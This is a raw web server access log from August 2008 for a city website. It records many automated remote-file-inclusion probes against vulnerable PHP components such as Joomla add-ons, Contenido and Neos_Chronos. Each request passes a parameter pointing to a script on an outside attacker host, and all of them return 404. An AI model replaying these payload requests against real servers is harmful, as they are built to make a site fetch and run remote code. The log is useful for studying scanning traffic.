202.181.105.117 - - [31/Aug/2008:19:00:48 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:00:53 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:00:54 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:01:26 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:01:33 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.47.247.136 - - [31/Aug/2008:19:03:30 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:19:04:15 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.11.67.242 - - [31/Aug/2008:19:04:38 -0700] "GET /logs/access_080329.log//language.inc.php?langs_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
200.11.67.242 - - [31/Aug/2008:19:04:38 -0700] "GET //language.inc.php?langs_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
200.11.67.242 - - [31/Aug/2008:19:04:39 -0700] "GET /logs//language.inc.php?langs_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:05:18 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:05:18 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:05:46 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:06:45 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:06:45 -0700] "GET /errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:06:46 -0700] "GET /logs/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:07:04 -0700] "GET /logs/access_080329.log/popup.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:07:05 -0700] "GET /popup.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:07:05 -0700] "GET /logs/popup.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:07:19 -0700] "GET /logs/access.log/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:07:19 -0700] "GET /errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:07:20 -0700] "GET /logs/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:19:07:26 -0700] "GET /logs/index.php?meio=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:19:07:26 -0700] "GET /index.php?meio=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:07:27 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:07:28 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.47.247.136 - - [31/Aug/2008:19:07:39 -0700] "GET /logs/access_080401.log%20//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:07:46 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:07:47 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:07:47 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.11.67.242 - - [31/Aug/2008:19:08:10 -0700] "GET /logs/access_080330.log//language.inc.php?langs_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:19:09:15 -0700] "GET /logs/access_080201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:19:10:17 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:19:10:18 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:19:10:18 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:19:11:44 -0700] "GET /logs/access_080201.log/errors.php?error=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:12:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:12:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:12:06 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:12:06 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:12:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:12:20 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:19:13:07 -0700] "GET /logs/access_080201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
66.135.39.118 - - [31/Aug/2008:19:13:42 -0700] "GET /logs/access_080329.log//language.inc.php?langs_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.39.118 - - [31/Aug/2008:19:13:44 -0700] "GET //language.inc.php?langs_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.39.118 - - [31/Aug/2008:19:13:46 -0700] "GET /logs//language.inc.php?langs_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:14:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:14:16 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:24:01 -0700] "GET /logs/access_080701.log/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:19:24:03 -0700] "GET /logs/access_080701.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:32:46 -0700] "GET /logs/access.log/head.php?adresa=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:32:48 -0700] "GET /head.php?adresa=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:32:48 -0700] "GET /logs/head.php?adresa=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.205.57.211 - - [31/Aug/2008:19:40:06 -0700] "GET /page.php?p=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
74.205.57.211 - - [31/Aug/2008:19:40:06 -0700] "GET /logs/page.php?p=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.192.48.154 - - [31/Aug/2008:19:40:31 -0700] "GET /page.php?p=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "cityofarkadelphia.com"
67.192.48.154 - - [31/Aug/2008:19:40:31 -0700] "GET /logs/page.php?p=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "cityofarkadelphia.com"
65.18.170.161 - - [31/Aug/2008:19:41:49 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
65.18.170.161 - - [31/Aug/2008:19:41:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
65.18.170.161 - - [31/Aug/2008:19:41:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.57.163.125 - - [31/Aug/2008:19:43:41 -0700] "GET ///vwar/backup/errors.php?error=http://eduloco.kit.net/specialx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.68.226.130 - - [31/Aug/2008:19:45:04 -0700] "GET /logs/access.log//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
195.68.226.130 - - [31/Aug/2008:19:45:04 -0700] "GET //include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
195.68.226.130 - - [31/Aug/2008:19:45:05 -0700] "GET /logs//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:46:46 -0700] "GET /logs/access.log//errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:46:46 -0700] "GET //errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:46:46 -0700] "GET /logs//errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:19:46:59 -0700] "GET /logs/access_080531.log/index.php?meio.php=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:19:46:59 -0700] "GET /logs/index.php?meio.php=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.68.226.130 - - [31/Aug/2008:19:49:24 -0700] "GET /logs/access_080330.log//components/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
195.68.226.130 - - [31/Aug/2008:19:49:24 -0700] "GET //components/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
195.68.226.130 - - [31/Aug/2008:19:49:24 -0700] "GET /logs//components/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
195.68.226.130 - - [31/Aug/2008:19:49:54 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:50:16 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:50:16 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:50:16 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:19:50:31 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:19:50:47 -0700] "GET /logs/access_080330.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:19:50:52 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:19:50:54 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:19:58:03 -0700] "GET /logs/access_080330.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:19:58:04 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:19:58:04 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
69.16.217.88 - - [31/Aug/2008:19:58:05 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [31/Aug/2008:19:58:05 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [31/Aug/2008:19:58:05 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [31/Aug/2008:19:59:08 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:01:46 -0700] "GET /logs/access_071231.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:02:45 -0700] "GET /logs/access_080330.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:02:45 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:02:45 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:06:14 -0700] "GET /logs/access_071231.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
65.18.170.161 - - [31/Aug/2008:20:08:30 -0700] "GET /logs//include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
65.18.170.161 - - [31/Aug/2008:20:08:30 -0700] "GET //include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
65.18.170.161 - - [31/Aug/2008:20:08:30 -0700] "GET /logs/access.log//include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.85.222.106 - - [31/Aug/2008:20:09:02 -0700] "GET /logs/access.log//include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
70.85.222.106 - - [31/Aug/2008:20:09:02 -0700] "GET //include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
70.85.222.106 - - [31/Aug/2008:20:09:03 -0700] "GET /logs//include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
88.84.157.43 - - [31/Aug/2008:20:13:46 -0700] "GET /logs/access.log//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
88.84.157.43 - - [31/Aug/2008:20:13:47 -0700] "GET //include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
88.84.157.43 - - [31/Aug/2008:20:13:47 -0700] "GET /logs//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
84.241.0.10 - - [31/Aug/2008:20:14:34 -0700] "GET /logs/access_080101.log//errors.php?error=http://www.shkupi.nu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.208.16.94 - - [31/Aug/2008:20:15:11 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.208.16.94 - - [31/Aug/2008:20:15:11 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.208.16.94 - - [31/Aug/2008:20:15:11 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:15:11 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:15:11 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:15:12 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:15:16 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:15:16 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:15:16 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:20:15:27 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:20:15:27 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:20:15:27 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:15:40 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:15:40 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:15:41 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:15:53 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:15:53 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:15:53 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:20:15:55 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:20:15:56 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:16:01 -0700] "GET /logs/access.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:16:01 -0700] "GET /logs/access.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
